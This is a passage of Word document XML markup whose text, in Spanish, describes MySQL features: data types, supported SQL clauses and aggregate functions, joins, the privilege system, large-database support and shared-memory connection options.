        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DATETIME</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>TIMESTAMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>YEAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SET</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ENUM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, y tipos espaciales OpenGIS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Registros de longitud fija y longitud variable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="0082495F">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sentencias</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soporte completo para operadores y funciones en las cláusulas de consultas </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> y </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soporte completo para las cláusulas SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>GROUP BY</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> y </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Soporte de funciones de agrupación (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>COUNT(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>COUNT(DISTINCT ...)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>AVG()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>STD()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SUM()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>MAX()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>MIN()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, y</w:t>
      </w:r>
      <w:r w:rsidR="00E71805">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>GROUP_CONCAT()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soporte para </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>LEFT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> y </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>RIGHT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> cumpliendo estándares de sintaxis SQL y ODBC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soporte para alias en tablas y columnas como lo requiere el estándar SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>REPLACE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, y </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> devuelven el número de filas que han cambiado (han sido afectadas). Es posible devolver el número de filas que serían afectadas usando un flag al conectar con el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El comando específico de </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="0082495F">
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>MySQL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SHOW</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> puede usarse para obtener información acerca de la base de datos, el motor de base de datos, tablas e índices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Puede mezclar tablas de distintas bases de datos en la misma consulta (como en </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="0082495F">
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>MySQL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> 3.22).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082495F" w:rsidRPr="00F7769F" w:rsidRDefault="0082495F" w:rsidP="0082495F">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="0082495F">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Seguridad</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Un sistema de privilegios y contraseñas que es muy flexible y seguro, y que permite </w:t>
      </w:r>
      <w:r w:rsidR="00445DC2" w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>verificación</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> basada en el host. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082495F" w:rsidRPr="00F7769F" w:rsidRDefault="0082495F" w:rsidP="0082495F">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="0082495F">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalabilidad y </w:t>
      </w:r>
      <w:r w:rsidR="0082495F" w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>límites</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soporte a grandes bases de datos. Usamos </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="0082495F">
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>MySQL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> Server con bases de datos que contienen 50 millones de registros. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082495F" w:rsidRPr="00F7769F" w:rsidRDefault="0082495F" w:rsidP="0082495F">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="0082495F">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Conectividad</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="0082495F">
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>MySQL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> 5.0, los servidores Windows soportan conexiones con memoria compartida si se inicializan con la opción </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>--shared-memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Los clientes </w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>pueden conectar a través de memoria compartida usando la opción </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>--protocol=memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
